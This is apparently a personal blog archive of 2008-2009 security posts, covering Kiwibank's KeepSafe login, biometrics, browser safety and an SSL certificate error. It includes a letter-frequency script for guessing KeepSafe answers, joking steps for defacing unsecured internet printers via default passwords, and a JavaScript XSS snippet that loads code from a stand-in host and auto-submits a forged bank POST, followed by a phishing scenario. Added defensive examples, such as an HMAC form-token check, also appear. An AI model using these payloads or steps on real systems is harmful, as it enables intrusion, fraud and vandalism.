
Kiwibank’s KeepSafe feature, and ETAOIN SHRDLU

Friday, January 30 2009

Kiwibank have added a new step to their login process, called KeepSafe.

In this step, the user has supplied answers to a small set of questions they selected, such as “Where were you born?” or “What’s your pet’s name?”. When they log in they are shown the questions and asked to select randomly chosen letters from each answer (e.g. the 1st and 5th letters).

The aim is to defeat keyloggers. The user uses their mouse to select letters from a display of the alphabet, and they never type the whole answer, so an attacker who logged mouse clicks would have to capture multiple logins.

My guess is that password-stealing malware is common enough now that it poses a significant risk to banks.

Unfortunately for users, this system is quite inconvenient. It demands an unaccustomed degree of mental and physical dexterity to select the correct letters. It is also inaccessible to people using text-only browsers, or who have Javascript turned off (ironically, the very people least likely to be vulnerable to malware).

A friend suggested that their Keepsafe answer would be “Keepsafe is bloody annoying”. This inspired me. I realise now that the savvier user will set all their Keepsafe answers to AAAAAAAAAAAA.

I also wonder whether it wouldn’t be reasonably easy to guess Keepsafe answers. If I were a wily hacker, I’d use my dictionary to compile stats of the most common letters in English words, by word length and position in the word. Let’s see.

#!/usr/bin/python
# Python 2 script (file(), print statement, tuple-unpacking lambda).

import string

f = file('/usr/share/dict/words')

counts = [{'all':0},{'all':0},{'all':0},{'all':0},{'all':0},{'all':0}]

# snag all 6 letter words (len 7 because each line still has its newline)
for line in [l.lower().strip() for l in f.readlines() if len(l) == 7]:
    for i in range(6):
        # count the letters in position i
        letter = line[i]
        counts[i][letter] = counts[i].get(letter, 0) + 1
        # keep a total so we can compute a percentage easily
        counts[i]['all'] = counts[i]['all'] + 1

for pos in range(6):
    print "Position %d" % (pos + 1)
    tops = {}
    for letter in string.lowercase:
        # integer division under Python 2, so percentages are whole numbers
        tops[letter] = counts[pos].get(letter,0)*100/counts[pos]['all']
    # take the nine most frequent letters
    for pair in sorted(tops.iteritems(), key=lambda(k,v):(v,k), reverse=True)[0:9]:
        print "%s %02.2f%%" % (pair[0], pair[1]),
    print

Results:

Position 1
s 11.00% c 7.00% b 7.00% p 6.00% m 6.00% t 5.00% r 5.00% d 5.00% a 5.00%
Position 2
a 18.00% o 15.00% e 13.00% i 10.00% u 9.00% r 7.00% l 5.00% n 3.00% h 3.00%
Position 3
r 10.00% a 9.00% n 8.00% l 7.00% s 6.00% o 6.00% i 6.00% t 5.00% e 5.00%
Position 4
i 10.00% e 10.00% t 8.00% a 7.00% n 6.00% l 6.00% o 5.00% s 4.00% r 4.00%
Position 5
e 27.00% n 7.00% l 6.00% a 5.00% t 4.00% r 4.00% o 4.00% i 4.00% u 2.00%
Position 6
s 36.00% d 11.00% e 9.00% r 8.00% y 6.00% n 5.00% t 4.00% g 3.00% a 3.00%

The distribution of letters is quite skewed, and you get three goes with Keepsafe, so a patient intruder could probably guess a substantial minority of answers.
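To put a number on “substantial minority”, here is an added example (mine, not code from the original post) that estimates how often three guesses at a two-position challenge would succeed, using the distributions printed above. It assumes the two positions are independent, that letters outside each top nine are negligible, and that the bank draws challenge positions uniformly; it is the kind of estimate a bank would use to size its lockout policy, and it also gives the uniform-alphabet baseline for comparison.

```python
from itertools import combinations

# Per-position letter frequencies (percent) for six-letter words, copied from
# the script output above. Letters outside each top nine are treated as 0%.
POSITION_FREQ = [
    {'s': 11, 'c': 7, 'b': 7, 'p': 6, 'm': 6, 't': 5, 'r': 5, 'd': 5, 'a': 5},
    {'a': 18, 'o': 15, 'e': 13, 'i': 10, 'u': 9, 'r': 7, 'l': 5, 'n': 3, 'h': 3},
    {'r': 10, 'a': 9, 'n': 8, 'l': 7, 's': 6, 'o': 6, 'i': 6, 't': 5, 'e': 5},
    {'i': 10, 'e': 10, 't': 8, 'a': 7, 'n': 6, 'l': 6, 'o': 5, 's': 4, 'r': 4},
    {'e': 27, 'n': 7, 'l': 6, 'a': 5, 't': 4, 'r': 4, 'o': 4, 'i': 4, 'u': 2},
    {'s': 36, 'd': 11, 'e': 9, 'r': 8, 'y': 6, 'n': 5, 't': 4, 'g': 3, 'a': 3},
]


def guess_success_rate(pos_a, pos_b, attempts=3):
    """Probability that the `attempts` most likely letter pairs for 1-based
    positions pos_a and pos_b include the true pair. Assumes the two
    positions are independent (an approximation: real words are correlated)."""
    fa = POSITION_FREQ[pos_a - 1]
    fb = POSITION_FREQ[pos_b - 1]
    joint = sorted((pa * pb / 10000.0 for pa in fa.values() for pb in fb.values()),
                   reverse=True)
    return sum(joint[:attempts])


def average_success_rate(attempts=3):
    """Mean over all 15 position pairs: the per-login success rate to expect
    if the challenge positions are chosen uniformly at random."""
    pairs = list(combinations(range(1, 7), 2))
    return sum(guess_success_rate(a, b, attempts) for a, b in pairs) / len(pairs)


def uniform_success_rate(attempts=3):
    """Baseline if answers were random letters: attempts out of 26*26 pairs."""
    return attempts / (26.0 * 26.0)


if __name__ == '__main__':
    for a, b in combinations(range(1, 7), 2):
        print('positions %d,%d: %.1f%%' % (a, b, 100 * guess_success_rate(a, b)))
    print('average: %.1f%%' % (100 * average_success_rate()))
    print('uniform baseline: %.2f%%' % (100 * uniform_success_rate()))
```

The worst pair (positions 5 and 6) comes out around 15%, roughly 35 times the uniform baseline, and the average across pairs is about 8% per login before any lockout applies.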

I’m not sure what the end of this arms race will be.

no comments

Tags: security ~ kiwibank ~ python

Issues in authentication systems

Friday, November 14 2008

I have my own issues with biometric authentication systems, but this is not one I had foreseen.

To Whom it May concern: It has come to the attention of Recognition Systems that some people have a particular concern about using our hand scanners which relates to their religious beliefs. The concern revolves around the detection or placement of what is described in the Scriptures as “the mark of the Beast.”

Read the whole thing.

no comments

Tags: security ~ authentication ~ biometrics

Things to do for bored children at home

Wednesday, September 24 2008

  1. Go to your networked printer’s administration page.
  2. Identify some useful phrases.
  3. Check the manual for the default password.
  4. Google for unsecured printers on the internet.
  5. Change their status message to something amusing.

NOTE: this is naughty and wrong. Do not do this. Unless it’s your parents’ printer.

(Interestingly, these things mostly seem to be at universities. I remember when I worked at a university, it was nigh impossible to forbid people to put unapproved hardware on the network. And as an admin there said to me, the purpose of the firewall was not to protect students from the world out there, but to save the rest of the world from our students.)

no comments

Tags: security

Naughtiness in three easy steps.

Wednesday, August 20 2008

First, insert your code into a page from a.example.com. XSS via SQL injection is probably the right way.

var sc = document.createElement('script');
sc.setAttribute('type','text/javascript');
sc.setAttribute('src','http://b.example.com/naughty.js');
document.getElementsByTagName("head")[0].appendChild(sc);

Second, insert the code of your choice into the DOM from http://b.example.com/naughty.js. That’s a nice-to-have; you could have put this in the first script:

var badform = document.createElement('FORM');
document.body.appendChild(badform);
// ... add appropriate fields to badform here
badform.action="http://tastybank.example.com";
badform.method = "POST"; // note that existing cookies for tastybank in this session will be sent
var f = function () {badform.submit(); return false};
f(); // we could make this an event handler on one or more DOM elements so the user really does it to themselves

Third, um, er, PROFIT.

But we don’t have to go as far as POSTing to another site. For example, suppose on inspecting a user’s history we notice they visited their PayPal account earlier. Why not redirect to a fake PayPal screen, and ask them to log in again? Quite a large proportion of users will hand over their credentials. You can harvest them and then redirect to a real PayPal screen. The possibilities are endless.

Or you can just write a Flash applet with cute kittens and do anything you want from there—I hear the Flash sandbox is kind of lax, and how else will we order Hell Pizza?

If you own TastyBank (or PayPal) the right thing to do is put signed unique tokens in all your forms and reject any forms that don’t have a valid token. Because there are more shitty PHP forum apps out there on popular sites than we will ever be able to track down and fix.
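One way to implement the signed-token defence described above, as an added example in Python (not code from the original post or from any site it names): each token is bound to the user’s session id with an HMAC, carries an expiry, and is checked in constant time on every state-changing request. The session id, the one-hour lifetime and the field name are assumptions.

```python
import base64
import hashlib
import hmac
import os
import time

# Server-side key, generated fresh here for the example. A real deployment
# loads a persistent secret from configuration so tokens survive restarts.
SECRET_KEY = os.urandom(32)
TOKEN_LIFETIME = 3600  # seconds; assumed lifetime for this example


def _mac(secret, session_id, expiry, nonce):
    # Binding the session id into the MAC means a token stolen from one
    # session (or minted by the attacker's own session) fails for another.
    msg = ('%s|%d|%s' % (session_id, expiry, nonce)).encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def make_form_token(session_id, secret=SECRET_KEY, now=None):
    """Return 'expiry.nonce.mac' for the session identified by session_id."""
    expiry = int(time.time() if now is None else now) + TOKEN_LIFETIME
    nonce = base64.urlsafe_b64encode(os.urandom(12)).decode()  # no '.' chars
    return '%d.%s.%s' % (expiry, nonce, _mac(secret, session_id, expiry, nonce))


def hidden_field(token):
    """Markup to embed in every form that changes state."""
    return '<input type="hidden" name="csrf_token" value="%s">' % token


def verify_form_token(token, session_id, secret=SECRET_KEY, now=None):
    """True only if the MAC matches this session and the token is unexpired.
    A cross-site form like the one above never sees the victim's token and
    cannot compute the MAC without the secret, so it is rejected here."""
    now = time.time() if now is None else now
    try:
        expiry_s, nonce, mac = token.split('.')
        expiry = int(expiry_s)
    except (AttributeError, ValueError):
        return False
    if expiry < now:
        return False
    return hmac.compare_digest(_mac(secret, session_id, expiry, nonce), mac)
```

Reject the request (not just the form) whenever verify_form_token returns False, and issue the token only in pages served to the authenticated session.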

no comments

Tags: security ~ javascript ~ DOM

Protecting your goodies on the web is hard

Tuesday, August 19 2008

Update: for commenter Rob, the presentation that sparked this post centred on a demonstration of beef.

At work the other day an ex-employee who specialises in security gave us a presentation which could be summarised thus: if you want a safe, normal web-browsing experience, you are doomed. Your browser will be compromised, your secret details stolen, and your PC turned into a zombie. This is not merely possible, but likely, and ultimately inevitable.

The slightly longer summary could be turned into bullet points like this:

This is… disappointing. Much of the fun and even some of the utility of the modern web relies on the execution of Javascript. Is there any alternative to turning off Javascript?

There are some.

1. Use Firefox with the NoScript extension. This is probably ok for people who have the time and skill to evaluate scripts and decide for themselves whether they are safe to run.

2. Whenever you use a site to do secret stuff, close all browser sessions first. Then open a fresh one. As soon as you have finished what you are doing, close your browser again. This is a painful, error-prone practice to keep up; a stop-gap measure.

3. Use Prism, and only Prism, to run things that you care about. Prism is a standalone browser based on Firefox but with no menus, no location bar, and no tool bar. When you launch a Prism-hosted application, it will run in its own browser process, unconnected to any other browser sessions. So you install Prism and configure a launcher for your online banking, a launcher for your webmail, a launcher for your sharebroker, and so on. Your session can’t be hijacked unless an attacker has compromised the actual server hosting your application.

5 comments

Tags: security

Believing what people tell you

Thursday, August 14 2008

We never had a ZX Spectrum at home. After the ZX81, we got an Amstrad CPC 464. But still, those Spectrums were very popular, and I knew people who had them.

Amazingly, there are quite a few still out there serving web pages right now….

(And more seriously, there are a lot of Tomcat servers directly on the Internet. Tasty, vulnerable Tomcat servers.)

no comments

Tags: funny ~ security

On the one hand, on the other hand

Wednesday, July 30 2008

The newest versions of Firefox and IE are sticklers when it comes to SSL, which is why right now this second, you’ll see this message if you use Kiwibank’s online banking:

Secure Connection Failed
An error occurred during a connection to www.kiwibank.co.nz.

Peer’s Certificate has been revoked.

(Error code: sec_error_revoked_certificate)

Firefox is not very helpful at this point. With other SSL problems it will show you the certificate and how it was/was not verified. No such facility here.

According to the phone banking person I just talked to, the authority that issued their certificate assumed they were in the UK(!) and set various fields accordingly.

This is not good.

However, what was good was that my call was answered in about 30s, the person on the other end knew about the problem already, they had a reasonable explanation, and they had a suggested workaround. In these days of outsourced, scripted help desks, that’s pretty good indeed.

1 comment

Tags: security ~ firefox ~ kiwibank ~ support
